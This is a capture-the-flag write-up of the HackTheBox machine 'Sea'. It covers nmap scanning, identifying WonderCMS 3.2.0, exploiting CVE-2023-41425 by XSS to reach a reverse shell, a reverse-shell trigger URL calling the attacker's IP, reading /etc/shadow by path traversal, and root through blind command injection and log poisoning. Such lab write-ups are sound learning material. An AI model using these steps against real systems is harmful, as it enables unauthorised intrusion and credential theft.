Hello hackers,wanted to share with season-6 machine from hackthebox,
```
Name: sea
Level: Easy
OS: Linux
Season: 6
Author: FisMatHack
```
SEA is Easy machine from HTB which relies on enumerating to get initial footholding. As usually with pentesting you will need to start with scanning and move on to other steps.
# Scanning
With scanning nmap and rustscan was able to identify two open ports.
```
# Nmap 7.94SVN scan initiated Thu Dec 19 06:06:44 2024 as: /usr/lib/nmap/nmap --privileged -vvv -p 22,80 -sC -sV -oN nmap.txt 10.10.11.28
Nmap scan report for 10.10.11.28
Host is up, received timestamp-reply ttl 63 (0.25s latency).
Scanned at 2024-12-19 06:06:47 EST for 18s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCZDkHH698ON6uxM3eFCVttoRXc1PMUSj8hDaiwlDlii0p8K8+6UOqhJno4Iti+VlIcHEc2THRsyhFdWAygICYaNoPsJ0nhkZsLkFyu/lmW7frIwINgdNXJOLnVSMWEdBWvVU7owy+9jpdm4AHAj6mu8vcPiuJ39YwBInzuCEhbNPncrgvXB1J4dEsQQAO4+KVH+QZ5ZCVm1pjXTjsFcStBtakBMykgReUX9GQJ9Y2D2XcqVyLPxrT98rYy+n5fV5OE7+J9aiUHccdZVngsGC1CXbbCT2jBRByxEMn+Hl+GI/r6Wi0IEbSY4mdesq8IHBmzw1T24A74SLrPYS9UDGSxEdB5rU6P3t91rOR3CvWQ1pdCZwkwC4S+kT35v32L8TH08Sw4Iiq806D6L2sUNORrhKBa5jQ7kGsjygTf0uahQ+g9GNTFkjLspjtTlZbJZCWsz2v0hG+fzDfKEpfC55/FhD5EDbwGKRfuL/YnZUPzywsheq1H7F0xTRTdr4w0At8=
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMMoxImb/cXq07mVspMdCWkVQUTq96f6rKz6j5qFBfFnBkdjc07QzVuwhYZ61PX1Dm/PsAKW0VJfw/mctYsMwjM=
| 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHuXW9Vi0myIh6MhZ28W8FeJo0FRKNduQvcSzUAkWw7z
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Sea - Home
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 19 06:07:05 2024 -- 1 IP address (1 host up) scanned in 20.79 seconds
```
# Enumeration
As you can see above we got two open ports i.e 22, and port 80. From here i saw port 22 was running latest version of openssh so its defficult to get an initial access from here,but we can try the other way which is brute-forcing username and password but since I knew that maybe they will be something like Rate-Limite on ssh i didn't want to bother here.
## port 80
With port `80` is running a web server, as seen from nmap, so i decided to give it a smoke and see what i can do with it.
Now from here, i decided to run dirsearch, and gobuster at once meanwhile the keep running i will proceed with manual searching.
```
# from dirsearch
1. /themes/
2. /messages/
3. /404
4. /plugins/
5. /home
```
But after some time i realized that all the directories i can also get them with manual without wasting my CPU like this. If we check the source code from the default page we can see all this and some addition pages.
After looking around the source-code again i managed to find the `/contant.php` directory.
After some testing things like xss,ssrf, but all of them didn't work so i decided to keep moving around with any hope of getting anything around again.
From the source code again, There is `/themes/` directory decide to do some fuzzing on it.
# Footholding
### README.md
```
## /themes/bike/README.md
OUTPUT:
# WonderCMS bike theme
## Description
Includes animations.
## Author: turboblack
## Preview
## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.
```
### version
```
http://10.10.11.28/themes/bike/version
OUTPUT:
3.2.0
```
From the `README.md` and `version`, I saw that i was dealing with `WonderCMS v3.2.0`
# Exploitation
After some google with wondercms and its version found that `v3.2.0` i found the version was vulnerable to rce.[article](https://www.exploit-db.com/exploits/49155)
The article with its docs says i need a admin-password to exploit this authenticated remote code execution. So from here i kept moving around searching for unauthenticated rce.
After some times i found this [article](https://github.com/prodigiousMind/CVE-2023-41425), which sayes there is a xss which can read us to rce.
```
Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.
```
### how the exploit works
The exploit takes three arguments target-url, our local-ip and lport, When we run the exploit it generates a malicious `xss.js` file which inside it contains a php-reverse-shell path to our localmachine, So in order to trigger the rce, we need to use the malicious url that is being generated by our exploit to send it to the target and once an admin clicks the exploit we get a trigger to our localmachine.
NB: I have just summarize how the exploit works, if you can read the exploit-source code and the xss.js file u will understan more about the exploit, and even more about everything works
Everything can be summarized here
Sending the xss to the admin by using the contant page
And we wait like some 5-10 seconds for the trigger
And the simplest way to trigger the exploit is navigating to this url
```
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.132&lport=1234
```
```
## users
www-data@sea:/var/www/sea$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
amay:x:1000:1000:amay:/home/amay:/bin/bash
geo:x:1001:1001::/home/geo:/bin/bash
www-data@sea:/var/www/sea$ ls
```
Going back to the `/var/www/sea` we found a database.js file which contains a hash and its crackable.
### ssh-creds
```
username:amay
password:<REDACTED>
```
# Privilege Escalation
Privilee Escalation is kinda simple, after we have gain access to the system, trying basics enumeration without running linpeas or pspy64, always i like to stick to the basics with easy-machine.
## Pivoting
After moving here and there i found something very interesting with an internal network.
As we can see that there is port `8080` running local, so i decided to forward it to my computer as follows.(Local portforwading)
After checking what is running via browser, we can see that it need authentication to access it, even via curl.
### Creds
```
username:amay
password: <REDACTED>
```
If you click analyze logs we can see it print logs that is so weird, i decided to fire up my burpsuite to analyze what it is trying to call at the backend.
After check with burpsuite i realised it recalling a `POST` request when you click `analyze`.
After some checking here and there i found that there is LFI/path traversal and OS-command injection.
### LFI
If you analyze what this `POST` request is trying to do is that is trying to call the log-file `(/var/log/apache2/access.log)`.Where by can try to to change the file path from the one it call to any type of file.
And to prove were reading this file as root we can try to fetch the `/etc/shadow` file.
This was very interesting,
Anyway this one was beyond root, but you can poison logs and get command injection and then root
### blind OS-command injection
Apart from `LFI` there is also a command injection exploit check this.
#### PoC:
### root-access(shortest way to get root)
As you can see i managed to change the SUID binary, going back to the target machine.
EXTRA-STUFFS:
I wasn't sastified with blind command injection,Earlier i saw LFI, Beyond root there is another way you can get rce with LFI by using the LFI we say earlier, this is just bonus, so give it a try.
Hint: use curl with creds to send a poison log to the server basically you can just send the simple php command payload and since, check it with `/var/log/apache2....` and then try from there you can try.
Like this since i was able to read file like `/etc/shadow` and other among, the only file that i was not able to read was `/root/root.txt`
Sign in with Wallet
Connect another wallet